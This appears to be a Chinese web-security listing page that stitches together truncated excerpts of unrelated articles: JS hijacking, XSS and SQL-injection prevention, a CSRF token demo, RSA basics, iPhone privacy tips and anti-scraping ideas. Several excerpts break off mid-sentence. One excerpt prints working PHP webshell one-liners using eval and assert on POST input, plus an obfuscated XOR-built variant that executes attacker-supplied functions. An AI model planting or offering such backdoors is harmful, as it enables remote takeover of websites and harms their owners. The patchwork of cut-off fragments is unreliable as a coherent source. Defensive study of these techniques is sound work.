javascript劫持属于HTTP劫持中的一种,主要是劫持js文件,然后在网页中通过js脚本往网页中注入图片和链接或者框架广告,也叫流量劫持。 文明一点的劫持只是右下角放一个固定广告,不文明的就自动弹出新广告窗口(一般会被浏览器拦截)或者给整个网页添加点击事件弹出新广告页面。
对网站发动XSS攻击的方式有很多种,仅仅使用php的一些内置过滤函数是对付不了的,即使你将filter_var,mysql_real_escape_string,htmlentities,htmlspecialchars,strip_tags这些函数都使用上了也不一定能保证绝对的安全。
那么如何预防 XSS 注入?主要还是需要在用户数据过滤方面得考虑周全,在这里不完全总结下几个 Tips
1. 假定所有的用户输入数据都是“邪恶”的
2. 弱类型的脚本语言必须保证类型和期望的一致
3. 考虑周全的正则表达式
4. strip_tags、htmlspecialchars 这类函数很好用 <b
一个最常见的一句话后门可能写作这样
<?php @eval($_POST['cmd']);?>
或这样
<?php @assert($_POST['cmd']);?>
tudouya 同学在FREEBUF上给出[一种构造技巧]利用
<?php @$_++; // $_ = 1 $__=("#"^"|"); // $__ = _ $__.=("."^"~"); // _P $__.=("/"^"`"); // _PO $__.=("|"^"/"); // _POS $__.=("{"^"/"); // _POST ${$__}[!$_](${$__}[$_]); // $_POST[0]($_POST[1]); ?>
进入数字信息时代之后,消费者对自身的隐私安全越来越重视,而对于 iPhone 用户来说,隐私信息并不仅限于手机本身,还需要考虑 iCloud 和 Apple ID 等方面的信息安全。今天,我们就来说一说提升 iPhone 用户隐私安全等级的 8 个小技巧,一起来看看吧。
1. 开启 Find My iPhone 功能
最近22万个iCloud账户被盗事件相信大家都知道了,那么怎么才能查询到自己的iCloud帐号密码是否泄漏了呢?小编下面就给大家推荐一款iCloud盗号木马查杀工具,希望可以帮助大家监测自己的帐号是否被盗。
我们已经知道该恶意程序是主要
跨站攻击就是利用程序上的一些细节或bug问题进行的,那么我们要如何耿防止跨站攻击呢?下面就以一个防止跨站攻击例子来说明,希望对各位有帮助。
<?php
#demo for prevent csrf
/**
* enc
*/
function encrypt($token_time) {
return md5('!@##$@$$#%43' . $token_time);
一、问题描述:
如果用户输入的数据在未经处理的情况下插入到一条SQL查询语句,那么应用将很可能遭受到SQL注入攻击,正如下面的例子:
$unsafe_variable = $_POST['user_input'];
mysql_query("INSERT INTO `table` (`column`) VALUES ('" . $unsafe_variable . "')");
我们都知道,只要合理正确使用PDO,可以基本上防止SQL注入的产生,本文主要回答以下两个问题:
为什么要使用PDO而不是mysql_connect?
为何PDO能防注入?
使用PDO防注入的时候应该特别注意什么?
一、为何要优先使用PDO?
PHP手册上说得很清楚:
Prepared statements and stored procedures<b
1.首先介绍下什么是RSA算法,让大家对RSA算法有个简要的理解.
RSA算法非常简单,概述如下:
找两素数p和q
取n=p*q 如:n=3*7=21
取t=(p-1)*(q-1) 如:t = 2*6 = 12
取任何一个数e,要求满足e
取d*e%t==1 如:d=7,e=7,则7*7/12刚好等于1满足要求
我认为,保护服务器端的数据,有这么几个关键点:
1、不能对使用体验产生影响,这就排除掉了诸如每次接口调用都要求用户输入验证码这样的做法
2、接口调用的网络交互需要无规律可循,比如article/1 –> article/1000 这样的接口就太容易被其他人爬走了
3、要严格意义上阻击爬虫,需要每一次网络请求都是不可重放的,这样才能避免其他人通过监听网络交互并重放来爬取数据
4、对服务器端编码不产生太大影响,如果要对服务器端伤筋动骨的大改,肯定是要不得的